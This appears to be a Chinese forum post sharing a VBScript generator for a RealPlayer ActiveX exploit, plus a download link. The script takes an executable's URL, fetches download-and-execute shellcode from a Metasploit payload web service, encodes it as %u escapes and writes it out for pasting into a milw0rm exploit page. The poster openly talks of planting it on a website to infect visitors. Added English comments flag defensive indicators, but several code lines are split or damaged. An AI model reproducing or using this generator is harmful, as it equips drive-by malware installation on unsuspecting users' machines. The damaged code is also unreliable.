milw0rm上的,生成器
lcx给的,稍微改了改代码,据说好用
未测试,最近忙到自杀的时间都没有
唉,可惜有马时候没洞,有洞时候没马,要不就找个站挂上了。

http://www.blogjava.net/Files/baicker/Real_Player_rmoc3260_exp.rar


以下原vbs文件:
'以下代码保存成vbs,双击即可

' Top-level driver: asks for a URL, requests generated payload text from a
' remote web interface, and reduces the returned HTML to a bare string in `code`.
' NOTE(review): in this listing several assignments are split across two lines
' (name on one line, "= value" on the next), so the text here is not
' byte-for-byte the original script; do not hash or signature it as such.
'
' Error handling is disabled for the whole script: a failed download or a
' missing match does not stop execution, it just yields empty output.
On Error Resume Next
' Operator-supplied URL of an executable; the third quoted string is the
' pre-filled default shown in the prompt.
Exeurl 
= InputBox"请输入exe的地址:""输入""http://www.haiyangtop.net/333.exe" )
' Request sent to a payload-generation web interface on TCP port 55555.
' Visible query parameters: MODULE=win32_downloadexec, OPT_URL=<the URL above>,
' BadChars=0x00, ENCODER=Msf::Encoder::Alpha2, ACTION=Generate Payload.
' Defensive note: a script host making an outbound HTTP request to this
' host/port with these parameter names is a usable network indicator.
url 
= "http://metasploit.com:55555/PAYLOADS?parent=GLOB%280x2b94a2879c50%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL="&URLEncoding(Exeurl)&"&MaxSize=&BadChars=0x00+&ENCODER=Msf%3A%3AEncoder%3A%3AAlpha2&ACTION=Generate+Payload"
' Fetch the response page as text (plain HTTP; the response is not authenticated
' or validated before use).
Body 
= getHTTPPage(url)
' Screen-scrape the response: capture from the literal "$shellcode =" up to the
' closing "</div></pre>" markup.
Set Re = New RegExp
Re.Pattern 
= "(\$shellcode \=[\s\S]+</div></pre>)"
Set Matches = Re.Execute(Body)
' If nothing matched, Body keeps the whole page and is processed as-is below.
If Matches.Count>0 Then Body = Matches(0).value
' Strip the "$shellcode =" prefix, double quotes (Chr(34)), CR, LF, semicolons,
' the trailing markup and every "." character, then trim surrounding spaces.
code
=Trim(Replace(Replace(replace(Replace(Replace(Replace(Replace(Body,"$shellcode =",""),Chr(34),""),Chr(13),""),";",""),"</div></pre>",""),Chr(10),""),".",""))

' replaceregex(str): returns str with every adjacent pair of "\xNN" escapes
' rewritten as one "%u" escape whose two byte values are swapped ("%u$2$1").
' Matching is case-insensitive and applied to all occurrences.
' Defensive note: long runs of %uXXXX escapes in a text file or web page are a
' common content-inspection signal for encoded binary payloads.
function replaceregex(str)
set regex=new regExp
' Two consecutive \x escapes, each capturing any two characters after "\x".
regex.pattern
="\\x(..)\\x(..)"
regex.IgnoreCase
=true
' Replace every match, not just the first.
regex.global
=true
' Second captured byte is emitted first, then the first one.
matches
=regex.replace(str,"%u$2$1")
replaceregex
=matches
end Function

' getHTTPPage(Path): downloads Path with GetBody and returns the response
' bytes decoded as GB2312 text via BytesToBstr.
' No check is made that the download succeeded before decoding.
Function getHTTPPage(Path)
 t 
= GetBody(Path)
 getHTTPPage 
= BytesToBstr(t, "GB2312")
End Function

' GetBody(url): issues an HTTP GET through the Microsoft.XMLHTTP COM object and
' returns the raw response body (.ResponseBody).
' The HTTP status is never inspected, and errors are suppressed, so a failed
' request presumably leaves the return value unset - confirm against callers.
' Defensive note: a Windows Script Host process instantiating Microsoft.XMLHTTP
' and then making outbound requests is worth alerting on in endpoint telemetry.
Function GetBody(url)
 
On Error Resume Next
 
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
 
With Retrieval
 ' Third argument False requests a synchronous call (Send blocks until done).
 ' NOTE(review): the run of quote characters after False looks like
 ' extraction damage rather than original code.
 .Open 
"Get", url, False""""
 .Send
 GetBody 
= .ResponseBody
 
End With
 
Set Retrieval = Nothing
End Function

' BytesToBstr(Body, Cset): converts a byte array to a string by round-tripping
' it through an ADODB.Stream: write as binary, rewind, reread as text in the
' character set named by Cset.
' Defensive note: ADODB.Stream created from a script host is a frequently
' monitored COM object because it can read and write arbitrary binary data.
Function BytesToBstr(Body, Cset)
 
Dim objstream
 
Set objstream = CreateObject("adodb.stream")
 ' Type 1 = binary stream (adTypeBinary).
 objstream.Type 
= 1
 ' Mode 3 = read/write (adModeReadWrite).
 objstream.Mode 
= 3
 objstream.Open
 objstream.Write Body
 ' Rewind before changing the stream type.
 objstream.Position 
= 0
 ' Type 2 = text stream (adTypeText); the bytes are now decoded using Charset.
 objstream.Type 
= 2
 objstream.Charset 
= Cset
 BytesToBstr 
= objstream.ReadText
 objstream.Close
 
Set objstream = Nothing
End Function

' URLEncoding(vstrIn): returns vstrIn with only characters whose Asc() value has
' magnitude >= &HFF percent-encoded as two "%XX" groups (high part, low byte).
' Every other character, including URL-reserved ones such as "&", "=", "?" and
' space, is copied through unchanged, so this is not a general URL encoder:
' the caller's query string can be altered by reserved characters in the input.
Function URLEncoding(vstrIn)
 strReturn 
= ""
 
For aaaa = 1 To Len(vstrIn)
 ThisChr 
= Mid(vStrIn,aaaa,1)
 
 ' Characters with |Asc| below &HFF are appended verbatim.
If Abs(Asc(ThisChr)) < &HFF Then
 strReturn 
= strReturn & ThisChr
 
Else
 innerCode 
= Asc(ThisChr)
 
 ' Asc() can return a negative value here; add &H10000 to make it positive.
If innerCode < 0 Then
 innerCode 
= innerCode + &H10000
 
End If
 ' High part: masked with &HFF00, then integer-divided by &HFF (255).
 Hight8 
= (innerCode And &HFF00)\ &HFF
 Low8 
= innerCode And &HFF
 ' Hex() does not zero-pad, so a value below &H10 yields a single hex digit.
 strReturn 
= strReturn & "%" & Hex(Hight8) & "%" & Hex(Low8)
 
End If
 
Next
 URLEncoding 
= strReturn
End Function

' Output stage: writes the converted string to "a.txt" in the current directory
' and echoes it to the user.
' Defensive note: forensic artifacts are a file named a.txt next to the script
' containing one line per run, plus the echoed dialog/console text.
set fso=CreateObject("scripting.filesystemobject")
' Mode 8 = ForAppending, True = create the file if it does not exist, so
' repeated runs accumulate lines instead of overwriting.
set fileS=fso.opentextfile("a.txt",8,true)
fileS.writeline replaceregex(code)
wscript.echo replaceregex(code)
files.close
set fso=Nothing
' Final status message (Chinese): reports that a.txt was generated and refers
' the user to the shellcode1 value of the exploit page named in the string.
wscript.echo 
Chr(13)&"ok,生成a.txt,请用a.txt里的替换http://www.milw0rm.com/exploits/5332里的shellcode1内容即可"